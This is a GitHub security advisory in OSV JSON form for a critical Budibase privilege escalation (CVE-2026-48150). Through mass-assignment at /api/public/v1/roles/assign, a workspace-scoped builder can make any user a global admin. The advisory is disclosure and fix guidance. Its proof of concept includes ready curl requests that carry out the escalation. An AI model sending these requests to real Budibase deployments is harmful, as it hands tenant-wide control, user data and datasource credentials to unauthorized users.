{"id":"GHSA-6xp4-cf37-ppjh","summary":"Budibase: Workspace-scoped builder escalates to global admin via /api/public/v1/roles/assign","details":"## Summary\n\n`/api/public/v1/roles/assign` is guarded by the `builderOrAdmin` middleware, which passes any user who is a builder for the app id in the `x-budibase-app-id` header. That check admits both global builders and workspace-scoped builders (`builder.apps` set but `builder.global` unset). The controller then spreads the request body into the SDK call, and the SDK grants `builder.global=true` or `admin.global=true` on whichever user ids the caller supplies. Bob, a workspace-scoped builder with an API key, promotes himself or any other user to global admin with one POST. The whole flow is tenant-wide privilege escalation from an app-level role, available to anyone with an Enterprise license that unlocks the `EXPANDED_PUBLIC_API` feature.\n\n## Details\n\nController (`packages/server/src/api/controllers/public/roles.ts:13-17`):\n\n```typescript\nexport async function assignAppBuilder(ctx: Ctx) {\n  const { userIds, ...assignmentProps } = ctx.request.body\n  await sdk.publicApi.roles.assign(userIds, assignmentProps)\n  ctx.body = { data: { userIds } }\n}\n```\n\nNothing filters `assignmentProps`. The request body's `builder` and `admin` keys flow directly into the SDK.\n\nSDK (`packages/pro/src/sdk/publicApi/roles.ts:17-47`):\n\n```typescript\nexport async function assign(userIds: string[], opts: AssignmentOpts) {\n  if (!(await isExpandedPublicApiEnabled())) {\n    throw new Error(\"Unable to assign roles - license required.\")\n  }\n  const users = await userDB.bulkGet(userIds)\n  for (let user of users) {\n    // ...\n    if (opts.builder) {\n      user.builder = { global: true }\n    }\n    if (opts.admin) {\n      user.admin = { global: true }\n    }\n  }\n  await userDB.bulkUpdate(users)\n}\n```\n\nNo check that the caller already holds the privilege they are granting. `user.builder` is overwritten unconditionally, which also strips any existing `builder.apps` scope from the target.\n\nRoute guard (`packages/backend-core/src/middleware/builderOrAdmin.ts:6-20`):\n\n```typescript\nexport async function builderOrAdmin(ctx: UserCtx, next: any) {\n  if (ctx.internal || isAdmin(ctx.user)) { return next() }\n  const workspaceId = await getWorkspaceIdFromCtx(ctx)\n  if (!workspaceId && !env.isWorker()) {\n    ctx.throw(403, \"This request required a workspace id.\")\n  } else if (!workspaceId && !hasBuilderPermissions(ctx.user)) {\n    ctx.throw(403, \"Admin/Builder user only endpoint.\")\n  } else if (workspaceId && !isBuilder(ctx.user, workspaceId)) {\n    ctx.throw(403, \"Workspace Admin/Builder user only endpoint.\")\n  }\n  // passes\n}\n```\n\n`isBuilder(user, workspaceId)` returns true for any user whose `builder.apps` array contains the workspace id, even when `builder.global` is unset. The endpoint therefore trusts an app-level builder with a global-scope grant.\n\n## Proof of Concept\n\nTested on Budibase 3.35.8 (master at f960e361). The public API license gate at `roles.ts:18` was disabled in the test bundle so the underlying privilege-escalation could be reproduced end-to-end; on a licensed Enterprise tenant the gate passes and the same requests land.\n\nStep 1: the admin creates two users. Alice is a workspace-scoped builder on an app (`builder.apps: [app_...]`, `builder.global` unset, `admin.global` unset). Victim is a BASIC user.\n\nStep 2: Alice calls `GET /api/global/self/api_key` to mint an API key tied to her identity:\n\n```bash\ncurl -sS -b alice \"$BASE/api/global/self/api_key\"\n# → {\"apiKey\":\"80f28...\",\"userId\":\"us_dab...\",\"createdAt\":\"...\"}\n```\n\nStep 3: Alice calls `/api/public/v1/roles/assign` with the victim's id and `builder: true`. She scopes the request to her own app via `x-budibase-app-id` so `builderOrAdmin` passes:\n\n```bash\ncurl -sS -X POST \"$BASE/api/public/v1/roles/assign\" \\\n  -H \"Content-Type: application/json\" \\\n  -H \"x-budibase-api-key: $ALICE_APIKEY\" \\\n  -H \"x-budibase-app-id: $APP_ID\" \\\n  -d '{\"userIds\":[\"us_70b6...victim\"],\"builder\":true}'\n```\n\nAdmin verifies:\n\n```\nBEFORE: builder: {'global': False} admin: {'global': False}\nATTACK: HTTP 200 {\"data\":{\"userIds\":[\"us_70b6...\"]}}\nAFTER:  builder: {'global': True}  admin: {'global': False}\n```\n\nStep 4: Alice follows up with `\"admin\": true` and can target her own id:\n\n```bash\ncurl -sS -X POST \"$BASE/api/public/v1/roles/assign\" \\\n  -H \"Content-Type: application/json\" \\\n  -H \"x-budibase-api-key: $ALICE_APIKEY\" \\\n  -H \"x-budibase-app-id: $APP_ID\" \\\n  -d '{\"userIds\":[\"us_dab...alice\"],\"admin\":true}'\n```\n\n```\nAFTER: builder: {'apps': ['app_...']} admin: {'global': True}\n```\n\nAlice is now a global admin of the tenant. She kept `builder.apps` because the SDK only overwrites the keys it was asked to set; `admin: true` writes `admin = { global: true }` without touching `builder`.\n\n## Impact\n\nEvery workspace-scoped builder of any app in the tenant is one request away from global admin. Global admin grants unrestricted access to the tenant: every app in every workspace, every user, every datasource credential, every automation, every SCIM / OIDC / audit-log config. The mass-assignment also strips scoping from the target's existing role, so downgrading a legitimate global builder to an app-scoped builder fails: a later call reinstates `global: true`.\n\nA tenant that shares app-building duties across teams (the common Enterprise pattern) cannot hold the per-app boundary with the current middleware. This matches GHSA-2g39-332f-68p9 (Critical Privilege Escalation & IDOR via Missing RBAC) in shape and impact.\n\n## Recommended Fix\n\nEnforce the caller's privilege in the SDK, matching the grant they want to make:\n\n```typescript\n// packages/pro/src/sdk/publicApi/roles.ts:32-43\nconst caller = context.getIdentity() // or however the SDK resolves the caller\nif (opts.builder) {\n  if (!caller?.builder?.global && !caller?.admin?.global) {\n    throw new HTTPError(\"Only global builders or admins can grant global builder\", 403)\n  }\n  user.builder = { global: true }\n}\nif (opts.admin) {\n  if (!caller?.admin?.global) {\n    throw new HTTPError(\"Only global admins can grant global admin\", 403)\n  }\n  user.admin = { global: true }\n}\n```\n\nAlternative, equally valid: tighten `builderOrAdmin` so that endpoints which can set global-scope properties require `isGlobalBuilder` or `isAdmin`. That fixes this endpoint and any future endpoint that shares the middleware.\n\nWhichever fix lands, also strip `builder` and `admin` from `assignmentProps` at the controller boundary (`packages/server/src/api/controllers/public/roles.ts:14`) unless the caller has `admin.global=true`. Defense-in-depth against a future SDK regression.\n\n---\n*Found by [aisafe.io](https://aisafe.io)*","aliases":["CVE-2026-48150"],"modified":"2026-09-10T03:50:48.682601809Z","published":"2026-06-12T18:28:26Z","database_specific":{"cwe_ids":["CWE-915"],"severity":"CRITICAL","github_reviewed":true,"github_reviewed_at":"2026-06-12T18:28:26Z","nvd_published_at":"2026-05-27T18:16:27Z"},"references":[{"type":"WEB","url":"https://github.com/Budibase/budibase/security/advisories/GHSA-6xp4-cf37-ppjh"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-48150"},{"type":"PACKAGE","url":"https://github.com/Budibase/budibase"}],"affected":[{"package":{"name":"@budibase/server","ecosystem":"npm","purl":"pkg:npm/%40budibase/server"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"3.39.0"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-6xp4-cf37-ppjh/GHSA-6xp4-cf37-ppjh.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:L"}]}